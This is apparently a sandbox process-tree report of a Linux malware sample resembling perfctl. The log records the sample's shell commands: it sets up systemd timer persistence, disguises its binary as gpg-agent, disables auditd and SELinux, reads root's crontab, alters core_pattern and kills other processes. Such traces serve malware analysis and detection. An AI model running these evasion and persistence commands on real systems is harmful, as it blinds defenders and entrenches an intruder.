grep (PID: 6440, Parent: 6438, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -s -l "ldd " /usr/share/initramfs-tools/hooks/zz-dhclient /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/cryptpassdev /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/copymods /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/compcache /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/cloud-initramfs-dyn-netconf /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/overlayroot /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/ntfs_3g

sh New Fork (PID: 6439, Parent: 6436)

xargs (PID: 6439, Parent: 6436, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs grep -L "export PATH=.*/\\.local/bin:.PATH"

xargs New Fork (PID: 6461, Parent: 6439)

grep (PID: 6461, Parent: 6439, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptroot

raid5wq New Fork (PID: 6464, Parent: 6269)

sh (PID: 6464, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl daemon-reload;systemctl enable kmodaudit.timer;systemctl start kmodaudit.timer"

sh New Fork (PID: 6466, Parent: 6464)

systemctl (PID: 6466, Parent: 6464, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

sh New Fork (PID: 6471, Parent: 6464)

systemctl (PID: 6471, Parent: 6464, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable kmodaudit.timer

sh New Fork (PID: 6476, Parent: 6464)

systemctl (PID: 6476, Parent: 6464, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start kmodaudit.timer

raid5wq New Fork (PID: 6479, Parent: 6269)

who (PID: 6479, Parent: 6269, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

raid5wq New Fork (PID: 6499, Parent: 6269)

sh (PID: 6499, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6503, Parent: 6499)

who (PID: 6503, Parent: 6499, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6504, Parent: 6499)

wc (PID: 6504, Parent: 6499, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6505, Parent: 6269)

sh (PID: 6505, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6507, Parent: 6505)

who (PID: 6507, Parent: 6505, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6508, Parent: 6505)

wc (PID: 6508, Parent: 6505, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6509, Parent: 6269)

sh (PID: 6509, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6510, Parent: 6509)

who (PID: 6510, Parent: 6509, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6511, Parent: 6509)

wc (PID: 6511, Parent: 6509, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6514, Parent: 6269)

sh (PID: 6514, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6515, Parent: 6514)

who (PID: 6515, Parent: 6514, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6516, Parent: 6514)

wc (PID: 6516, Parent: 6514, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6517, Parent: 6269)

sh (PID: 6517, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 perfctl;pkill -9 perfctl"

sh New Fork (PID: 6520, Parent: 6517)

killall (PID: 6520, Parent: 6517, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 perfctl

sh New Fork (PID: 6555, Parent: 6517)

pkill (PID: 6555, Parent: 6517, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perfctl

raid5wq New Fork (PID: 6519, Parent: 6269)

sh (PID: 6519, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6521, Parent: 6519)

who (PID: 6521, Parent: 6519, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6522, Parent: 6519)

wc (PID: 6522, Parent: 6519, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6525, Parent: 6269)

sh (PID: 6525, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6528, Parent: 6525)

who (PID: 6528, Parent: 6525, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6529, Parent: 6525)

wc (PID: 6529, Parent: 6525, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6545, Parent: 6269)

sh (PID: 6545, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6546, Parent: 6545)

who (PID: 6546, Parent: 6545, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6547, Parent: 6545)

wc (PID: 6547, Parent: 6545, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6548, Parent: 6269)

chmod (PID: 6548, Parent: 6269, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod -R 777 /tmp/.xdiag/data

raid5wq New Fork (PID: 6549, Parent: 6269)

sh (PID: 6549, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6550, Parent: 6549)

who (PID: 6550, Parent: 6549, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6551, Parent: 6549)

wc (PID: 6551, Parent: 6549, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6554, Parent: 6269)

sh (PID: 6554, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6556, Parent: 6554)

who (PID: 6556, Parent: 6554, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6557, Parent: 6554)

wc (PID: 6557, Parent: 6554, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6558, Parent: 6269)

sh (PID: 6558, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6564, Parent: 6558)

who (PID: 6564, Parent: 6558, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6565, Parent: 6558)

wc (PID: 6565, Parent: 6558, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6568, Parent: 6269)

sh (PID: 6568, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6570, Parent: 6568)

who (PID: 6570, Parent: 6568, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6571, Parent: 6568)

wc (PID: 6571, Parent: 6568, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6580, Parent: 6269)

sh (PID: 6580, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root$'|xargs cat"

sh New Fork (PID: 6581, Parent: 6580)

find (PID: 6581, Parent: 6580, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: find /var/spool/cron/crontabs -type f

sh New Fork (PID: 6582, Parent: 6580)

grep (PID: 6582, Parent: 6580, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep cron

sh New Fork (PID: 6583, Parent: 6580)

grep (PID: 6583, Parent: 6580, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /root$

sh New Fork (PID: 6584, Parent: 6580)

xargs (PID: 6584, Parent: 6580, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs cat

xargs New Fork (PID: 6585, Parent: 6584)

cat (PID: 6585, Parent: 6584, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /var/spool/cron/crontabs/root

raid5wq New Fork (PID: 6599, Parent: 6269)

sh (PID: 6599, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"

raid5wq New Fork (PID: 6600, Parent: 6269)

sh (PID: 6600, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6601, Parent: 6600)

who (PID: 6601, Parent: 6600, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6602, Parent: 6600)

wc (PID: 6602, Parent: 6600, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6605, Parent: 6269)

sh (PID: 6605, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6606, Parent: 6605)

who (PID: 6606, Parent: 6605, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6607, Parent: 6605)

wc (PID: 6607, Parent: 6605, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6608, Parent: 6269)

sh (PID: 6608, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6609, Parent: 6608)

who (PID: 6609, Parent: 6608, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6610, Parent: 6608)

wc (PID: 6610, Parent: 6608, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6613, Parent: 6269)

sh (PID: 6613, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "PATH=/tmp/.perf.c:$PATH;export AAPCRK=c1cH3IVckE39;nohup perfctl >/dev/null 2>/dev/null & exit"

sh New Fork (PID: 6616, Parent: 6613)

nohup (PID: 6616, Parent: 1860, MD5: d8d3ce4d7f4b1e3ac3c3e7c9790f22ca) Arguments: nohup perfctl

perfctl (PID: 6616, Parent: 1860, MD5: 6e7230dbe35df5b46dcd08975a0cc87f) Arguments: perfctl

perfctl New Fork (PID: 6620, Parent: 6616)

raid5wq New Fork (PID: 6617, Parent: 6269)

sh (PID: 6617, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6618, Parent: 6617)

who (PID: 6618, Parent: 6617, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6619, Parent: 6617)

wc (PID: 6619, Parent: 6617, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6626, Parent: 6269)

sh (PID: 6626, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6627, Parent: 6626)

who (PID: 6627, Parent: 6626, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6628, Parent: 6626)

wc (PID: 6628, Parent: 6626, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6630, Parent: 6269)

sh (PID: 6630, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "ps -ax|grep perfctl|grep -v grep|awk '{print $1}'|xargs kill -9"

sh New Fork (PID: 6631, Parent: 6630)

ps (PID: 6631, Parent: 6630, MD5: ab48054475a6f70f8e7fa847331f3327) Arguments: ps -ax

sh New Fork (PID: 6632, Parent: 6630)

grep (PID: 6632, Parent: 6630, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep perfctl

sh New Fork (PID: 6633, Parent: 6630)

grep (PID: 6633, Parent: 6630, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v grep

sh New Fork (PID: 6634, Parent: 6630)

awk (PID: 6634, Parent: 6630, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $1}"

sh New Fork (PID: 6635, Parent: 6630)

xargs (PID: 6635, Parent: 6630, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs kill -9

xargs New Fork (PID: 6699, Parent: 6635)

kill (PID: 6699, Parent: 6635, MD5: 40c0f12bde854853f4eed7cd18e097a0) Arguments: kill -9 6620

raid5wq New Fork (PID: 6636, Parent: 6269)

sh (PID: 6636, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6639, Parent: 6636)

who (PID: 6639, Parent: 6636, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6640, Parent: 6636)

wc (PID: 6640, Parent: 6636, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6641, Parent: 6269)

sh (PID: 6641, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6642, Parent: 6641)

who (PID: 6642, Parent: 6641, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6643, Parent: 6641)

wc (PID: 6643, Parent: 6641, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6645, Parent: 6269)

sh (PID: 6645, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6646, Parent: 6645)

who (PID: 6646, Parent: 6645, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6647, Parent: 6645)

wc (PID: 6647, Parent: 6645, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6650, Parent: 6269)

sh (PID: 6650, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6651, Parent: 6650)

who (PID: 6651, Parent: 6650, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6652, Parent: 6650)

wc (PID: 6652, Parent: 6650, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6653, Parent: 6269)

sh (PID: 6653, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6654, Parent: 6653)

who (PID: 6654, Parent: 6653, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6655, Parent: 6653)

wc (PID: 6655, Parent: 6653, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6658, Parent: 6269)

sh (PID: 6658, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root$'|xargs cat"

sh New Fork (PID: 6659, Parent: 6658)

find (PID: 6659, Parent: 6658, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: find /var/spool/cron/crontabs -type f

sh New Fork (PID: 6660, Parent: 6658)

grep (PID: 6660, Parent: 6658, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep cron

sh New Fork (PID: 6661, Parent: 6658)

grep (PID: 6661, Parent: 6658, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /root$

sh New Fork (PID: 6662, Parent: 6658)

xargs (PID: 6662, Parent: 6658, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs cat

xargs New Fork (PID: 6666, Parent: 6662)

cat (PID: 6666, Parent: 6662, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /var/spool/cron/crontabs/root

raid5wq New Fork (PID: 6663, Parent: 6269)

sh (PID: 6663, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6664, Parent: 6663)

who (PID: 6664, Parent: 6663, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6665, Parent: 6663)

wc (PID: 6665, Parent: 6663, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6669, Parent: 6269)

sh (PID: 6669, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"

raid5wq New Fork (PID: 6674, Parent: 6269)

sh (PID: 6674, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6675, Parent: 6674)

who (PID: 6675, Parent: 6674, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6676, Parent: 6674)

wc (PID: 6676, Parent: 6674, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6679, Parent: 6269)

sh (PID: 6679, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6680, Parent: 6679)

who (PID: 6680, Parent: 6679, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6681, Parent: 6679)

wc (PID: 6681, Parent: 6679, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6689, Parent: 6269)

sh (PID: 6689, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6692, Parent: 6689)

who (PID: 6692, Parent: 6689, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6693, Parent: 6689)

wc (PID: 6693, Parent: 6689, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6701, Parent: 6269)

sh (PID: 6701, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6703, Parent: 6701)

who (PID: 6703, Parent: 6701, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6704, Parent: 6701)

wc (PID: 6704, Parent: 6701, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6702, Parent: 6269)

sh (PID: 6702, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 obfs4proxy;pkill -9 obfs4proxy"

sh New Fork (PID: 6705, Parent: 6702)

killall (PID: 6705, Parent: 6702, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 obfs4proxy

sh New Fork (PID: 6714, Parent: 6702)

pkill (PID: 6714, Parent: 6702, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 obfs4proxy

raid5wq New Fork (PID: 6708, Parent: 6269)

sh (PID: 6708, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6709, Parent: 6708)

who (PID: 6709, Parent: 6708, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6710, Parent: 6708)

wc (PID: 6710, Parent: 6708, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6711, Parent: 6269)

sh (PID: 6711, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6712, Parent: 6711)

who (PID: 6712, Parent: 6711, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6713, Parent: 6711)

wc (PID: 6713, Parent: 6711, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6715, Parent: 6269)

sh (PID: 6715, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6719, Parent: 6715)

who (PID: 6719, Parent: 6715, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6720, Parent: 6715)

wc (PID: 6720, Parent: 6715, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

raid5wq New Fork (PID: 6721, Parent: 6269)

sh (PID: 6721, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "who | wc -l"

sh New Fork (PID: 6726, Parent: 6721)

who (PID: 6726, Parent: 6721, MD5: 04e03e21fed4071259c4427b3baf5e8f) Arguments: who

sh New Fork (PID: 6727, Parent: 6721)

wc (PID: 6727, Parent: 6721, MD5: 2f44ec9941b5797742ec082e424af073) Arguments: wc -l

systemd New Fork (PID: 6315, Parent: 1)

true (PID: 6315, Parent: 1, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: /bin/true

systemd New Fork (PID: 6324, Parent: 6323)

snapd-env-generator (PID: 6324, Parent: 6323, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6332, Parent: 6331)

snapd-env-generator (PID: 6332, Parent: 6331, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6336, Parent: 6335)

snapd-env-generator (PID: 6336, Parent: 6335, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6442, Parent: 1)

sshd (PID: 6442, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t

systemd New Fork (PID: 6465, Parent: 1)

sshd (PID: 6465, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D

systemd New Fork (PID: 6468, Parent: 6467)

snapd-env-generator (PID: 6468, Parent: 6467, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6474, Parent: 6473)

snapd-env-generator (PID: 6474, Parent: 6473, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6477, Parent: 1)

journalctl (PID: 6477, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var

systemd New Fork (PID: 6478, Parent: 1)

perfcc (PID: 6478, Parent: 1, MD5: 656e22c65bf7c04d87b5afbe52b8d800) Arguments: /bin/perfcc

perfcc New Fork (PID: 6484, Parent: 6478)

getconf (PID: 6484, Parent: 6478, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf CLK_TCK

perfcc New Fork (PID: 6489, Parent: 6478)

getconf (PID: 6489, Parent: 6478, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf PAGESIZE

perfcc New Fork (PID: 6490, Parent: 6478)

sh (PID: 6490, Parent: 6478, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "PATH=/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;nohup /usr/bin/perfcc >/dev/null 2>/dev/null & exit"

sh New Fork (PID: 6491, Parent: 6490)

nohup (PID: 6491, Parent: 1, MD5: d8d3ce4d7f4b1e3ac3c3e7c9790f22ca) Arguments: nohup /usr/bin/perfcc

perfcc (PID: 6491, Parent: 1, MD5: 656e22c65bf7c04d87b5afbe52b8d800) Arguments: /usr/bin/perfcc

perfcc New Fork (PID: 6496, Parent: 6491)

getconf (PID: 6496, Parent: 6491, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf CLK_TCK

perfcc New Fork (PID: 6500, Parent: 6491)

getconf (PID: 6500, Parent: 6491, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf PAGESIZE

perfcc New Fork (PID: 6670, Parent: 6491)

sh (PID: 6670, Parent: 6491, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cp /proc/6491/exe /tmp/.perf.c/gpg-agent && chmod +x /tmp/.perf.c/gpg-agent"

sh New Fork (PID: 6671, Parent: 6670)

cp (PID: 6671, Parent: 6670, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp /proc/6491/exe /tmp/.perf.c/gpg-agent

sh New Fork (PID: 6682, Parent: 6670)

chmod (PID: 6682, Parent: 6670, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /tmp/.perf.c/gpg-agent

perfcc New Fork (PID: 6683, Parent: 6491)

sh (PID: 6683, Parent: 6491, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "PATH=/tmp/.perf.c:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;gpg-agent --supervised &"

sh New Fork (PID: 6684, Parent: 6683)

gpg-agent (PID: 6684, Parent: 1, MD5: 656e22c65bf7c04d87b5afbe52b8d800) Arguments: gpg-agent --supervised

gpg-agent New Fork (PID: 6690, Parent: 6684)

getconf (PID: 6690, Parent: 6684, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf CLK_TCK

gpg-agent New Fork (PID: 6694, Parent: 6684)

getconf (PID: 6694, Parent: 6684, MD5: 4c206cdb0a9f19e43beb204006c4067f) Arguments: getconf PAGESIZE

gpg-agent New Fork (PID: 6697, Parent: 6684)

sh (PID: 6697, Parent: 6684, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "auditctl -e0"

gpg-agent New Fork (PID: 6698, Parent: 6684)

sh (PID: 6698, Parent: 6684, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "echo 0 > /sys/fs/selinux/enforce"

gpg-agent New Fork (PID: 6700, Parent: 6684)

sh (PID: 6700, Parent: 6684, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "setenforce 0"

systemd New Fork (PID: 6485, Parent: 1)

systemd-journald (PID: 6485, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald

systemd New Fork (PID: 6572, Parent: 1)

journalctl (PID: 6572, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush

systemd New Fork (PID: 6586, Parent: 1)

